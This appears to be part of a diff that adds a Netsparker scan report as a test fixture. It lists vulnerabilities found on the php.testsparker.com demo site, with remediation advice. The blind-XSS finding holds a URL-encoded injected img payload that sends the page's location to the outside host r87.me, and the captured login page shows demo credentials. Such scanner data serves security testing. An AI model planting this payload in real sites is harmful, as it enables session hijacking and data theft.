"High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": 
"Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Incorrect Conversion between Numeric Types Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Loop with Unreachable Exit Condition ('Infinite Loop') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Check for Unusual or Exceptional Conditions Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + 
"Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Allocation of Resources Without Limits or Throttling Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Double Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer 
Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Server-Side Request Forgery (SSRF) Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information 
Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Please upgrade your installation of PHP to the latest stable version.
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "PhpOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "103", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "693", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

    \n

    The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "4f5de955-5e9d-4746-3fc0-ad490209f0e6", + "Impact": "
    \n

    Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is \"hijacking\" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.

    \n

    Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

    \n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-Frame-Options Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n
      \n
    • Send the proper X-Frame-Options HTTP response header to instruct the browser not to allow framing from other domains (a Django sketch follows this list).\n
        \n
      • X-Frame-Options: DENY completely denies the page from being loaded in a frame/iframe.
      • \n
      • X-Frame-Options: SAMEORIGIN allows framing only by pages from the same origin.
      • \n
      • X-Frame-Options: ALLOW-FROM URL allows framing only by the specified URL. Note, however, that not all browsers support this directive.
      • \n
      \n
    • \n
    • Employ defensive code in the UI to ensure that the current frame is the topmost window.
    • \n
    \n
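    As a minimal sketch of the first remediation above (illustrative only, not part of the scan fixture): a Django application such as DefectDojo can set this header globally with the framework's built-in clickjacking middleware, or per response; the view name below is hypothetical.

        # settings.py -- enable Django's built-in clickjacking protection
        MIDDLEWARE = [
            "django.middleware.clickjacking.XFrameOptionsMiddleware",
            # ... other middleware ...
        ]
        X_FRAME_OPTIONS = "DENY"  # or "SAMEORIGIN"

        # Alternatively, set the header on a single response:
        from django.http import HttpResponse

        def report_view(request):  # hypothetical view
            response = HttpResponse("ok")
            response["X-Frame-Options"] = "SAMEORIGIN"
            return response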
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXFrameOptionsHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "164.308(a)", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected a missing X-XSS-Protection header, which means that this website could be at risk of Cross-site Scripting (XSS) attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 05:45 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "f4fdd62e-a869-499f-b70d-ad48032ad260", + "Impact": "
    This issue is reported as additional information only. There is no direct impact arising from this issue.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Missing X-XSS-Protection Header", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Add the X-XSS-Protection header with a value of \"1; mode=block\" (a middleware sketch follows below).\n
      \n
    • \n
      X-XSS-Protection: 1; mode=block
      \n
    • \n
    \n
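    A minimal sketch of the remediation above, assuming a Django stack; the middleware class is hypothetical and illustrative only, not DefectDojo or fixture code.

        class XXssProtectionMiddleware:
            """Add X-XSS-Protection: 1; mode=block to every response."""

            def __init__(self, get_response):
                self.get_response = get_response

            def __call__(self, request):
                response = self.get_response(request)
                if not response.has_header("X-XSS-Protection"):
                    response["X-XSS-Protection"] = "1; mode=block"
                return response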
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "MissingXssProtectionHeader", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "", + "Cvss": null, + "Cvss31": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cwe": "16", + "Hipaa": "", + "Owasp": "", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Cookies are typically sent to third parties in cross-origin requests, which can be abused to mount CSRF attacks. The SameSite cookie attribute was proposed to disable third-party usage of selected cookies in order to prevent such attacks.

    \n

    Same-site cookies allow servers to mitigate the risk of CSRF and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "68368f54-b163-41d0-430c-ad49020a4d6b", + "Impact": "", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "SameSite Cookie Not Implemented", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "

    The server can set a same-site cookie by adding the SameSite=... attribute to the Set-Cookie header (a Django sketch follows this list). There are three possible values for the SameSite attribute:

    \n
      \n
    • Lax: In this mode, the cookie will only be sent with a top-level GET request.\n
      Set-Cookie: key=value; SameSite=Lax
      \n
    • \n
    • Strict: In this mode, the cookie will not be sent with any cross-site usage even if the user follows a link to another website.\n
      Set-Cookie: key=value; SameSite=Strict
      \n
    • \n
    • None: In this mode, the cookie will be sent with cross-site requests. Cookies with SameSite=None must also specify the Secure attribute so they are transferred over a secure context; a SameSite=None cookie without the Secure attribute will be rejected by browsers.
      \n
      Set-Cookie: key=value; SameSite=None; Secure
      \n
    • \n
    \n
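    As the sketch promised above (illustrative only, not fixture content): Django's set_cookie accepts a samesite argument, so a session cookie like the PHPSESSID flagged in this finding could be issued as follows; the view and cookie value are hypothetical.

        from django.http import HttpResponse

        def login_view(request):  # hypothetical login view
            response = HttpResponse("logged in")
            # Lax is a safe default; SameSite=None would also require secure=True.
            response.set_cookie("sessionid", "opaque-session-token",
                                samesite="Lax", secure=True, httponly=True)
            return response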

     

    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "SameSiteCookieNotImplemented", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "19", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.6" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.6" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.6" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + }, + "Cwe": "79", + "Hipaa": "164.308(a)", + "Owasp": "A3", + "OwaspProactiveControls": "", + "Pci32": "6.5.7", + "Wasc": "8" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise detected Blind Cross-site Scripting by capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

    \n

    This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=%3ciMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fpbgjnvv2k8sv_nfk8lpxyks_jxy7mrsm1rv6ic0g%27%2b%275ou.r87.me%2fr%2f%3f%27%2blocation.href%22%3e HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 2983\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:51:39 GMT\r\n\r\n", + "Duration": 0.0, + "StatusCode": 0 + }, + "LookupId": "6f963587-2af9-4fac-7b41-ad490211f172", + "Impact": "
    There are many different attacks that can be leveraged through the use of cross-site scripting, including:
    • Hijacking user's active session.
    • Mounting phishing attacks.
    • Intercepting data and performing man-in-the-middle attacks.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Blind Cross-site Scripting", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then it needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

    Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

    CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised for any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
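    A minimal sketch of context-aware output encoding, assuming plain Python (the function and sample input are illustrative; libraries such as OWASP ESAPI cover further contexts like JavaScript, URL and CSS):

        import html

        def render_greeting(user_input: str) -> str:
            # html.escape neutralizes <, >, & and quotes for the HTML context.
            return f"<p>Hello, {html.escape(user_input, quote=True)}</p>"

        # render_greeting('<script>alert(1)</script>')
        # -> '<p>Hello, &lt;script&gt;alert(1)&lt;/script&gt;</p>'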
